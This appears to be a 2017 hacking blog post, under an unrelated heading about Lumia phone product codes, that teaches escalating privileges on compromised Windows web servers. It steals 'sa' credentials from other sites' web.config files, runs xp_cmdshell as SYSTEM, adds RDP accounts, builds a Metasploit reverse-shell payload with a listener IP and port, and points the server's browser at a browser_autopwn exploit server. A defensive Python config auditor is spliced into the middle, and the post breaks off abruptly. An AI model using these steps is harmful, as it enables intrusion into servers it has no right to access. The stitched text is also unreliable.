Saturday, 5 August 2017
Product Codes Microsoft Lumia 435 RM 1069 1068 1070
Most of us here can hack websites and servers. But what we hate the most is an error message: Access Denied! We know some methods to bypass certain restrictions using symlinks, privilege escalation using local root exploits and similar attacks.
But these get the job done only on Linux servers. What about Windows servers?

Here are some ways to bypass certain restrictions on Windows servers or to get SYSTEM privileges.
- Using "sa" account to execute commands by MSSQL query via xp_cmdshell stored procedure.
- Using meterpreter payload to get a reverse shell over the target machine.
- Using browser_autopwn. (Really...)
- Using other tools like pwdump7, mimikatz, etc.
Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.
1. Using xp_cmdshell-
Most of the time on Windows servers, we have read permission on the files of other IIS users, which this method needs.
If we are lucky enough, we will find the login credentials of the MSSQL server's "sa" account inside the web.config file of some website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and, as the name tells, this user has all possible permissions over the server.
The picture below shows a connection string containing the login credentials of the "sa" account.

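A defender's check for the web.config pattern just described: this is an added example, not code from the post, and it assumes a standard connectionStrings section; the web.config it audits is a constructed sample embedded in the script.

```python
import xml.etree.ElementTree as ET

# Constructed sample web.config (not from any real server). The first entry is the
# weak pattern described above: the sa login with its password in plaintext.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="ShopDb"
         connectionString="Server=db01;Database=shop;User ID=sa;Password=P@ssw0rd!;" />
    <add name="LogDb"
         connectionString="Server=db01;Database=logs;UID=shop_app;PWD=secret;" />
    <add name="ReportsDb"
         connectionString="Server=db01;Database=reports;Integrated Security=SSPI;" />
  </connectionStrings>
</configuration>
"""


def parse_connection_string(cs):
    """Split 'Key=Value;Key=Value' into a dict keyed by lower-cased, trimmed names."""
    parts = {}
    for chunk in cs.split(";"):
        if "=" in chunk:
            key, value = chunk.split("=", 1)
            parts[key.strip().lower()] = value.strip()
    return parts


def audit_web_config(xml_text):
    """Return (name, severity, reason) for each connection string that hands a SQL
    login to anyone who can read the file. Integrated Security entries carry no secret."""
    findings = []
    root = ET.fromstring(xml_text)
    for add in root.iter("add"):
        cs = add.get("connectionString")
        if cs is None:
            continue  # <add> elements under appSettings etc. are not connection strings
        parts = parse_connection_string(cs)
        user = (parts.get("user id") or parts.get("uid") or "").lower()
        has_secret = "password" in parts or "pwd" in parts
        if user == "sa":
            findings.append((add.get("name"), "HIGH", "connects as the sa (sysadmin) login"))
        elif has_secret:
            findings.append((add.get("name"), "MEDIUM", "SQL login password stored in plaintext"))
    return findings


if __name__ == "__main__":
    for name, severity, reason in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"{severity:6} {name}: {reason}")
```

Run it against the web.config of every site on an IIS host; any HIGH finding means one readable file is enough to reach the database as sysadmin, and the fix is a least-privilege SQL login or Windows integrated authentication.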
Using this, we can log into the MSSQL server locally (using our web backdoor) as well as remotely. I would recommend remote access because it does not generate webserver logs, which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can log in remotely using HeidiSQL.
HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.
After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)
Syntax for the query is-
xp_cmdshell [command]
For example, if I need to know my current privileges, I would query-
xp_cmdshell whoami

This shows that I am currently NT AUTHORITY\SYSTEM, which most of us know is the highest user in the Windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.
Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
2. Meterpreter Payload-
This method is quite easy and comes in useful when we cannot read other users' files but can execute commands.
Using Metasploit, generate a reverse shell payload binary.
For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Now we will upload this executable to the server using our web backdoor.
Run the multi/handler auxiliary at our end. (Make sure the ports are forwarded properly.)
Now it's time to execute the payload.
If everything goes right, we will get a meterpreter session on the target machine as shown below.
We can also use php, asp or other payloads.

3. Browser Autopwn-
This seems odd as a way of hacking a server, but I myself found it a clever way to do the job, especially in scenarios where we are allowed to execute commands but cannot run executables (our payloads) due to software restriction policies in a domain environment.
Most Windows servers have an outdated Internet Explorer, and we can exploit it if we can execute commands.
I think it is clear by now what I'm trying to explain ;)
We can start Internet Explorer from the command line and make it browse to a specific URL.
Syntax for this-
iexplore.exe [URL]
where the URL is our server address, which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools-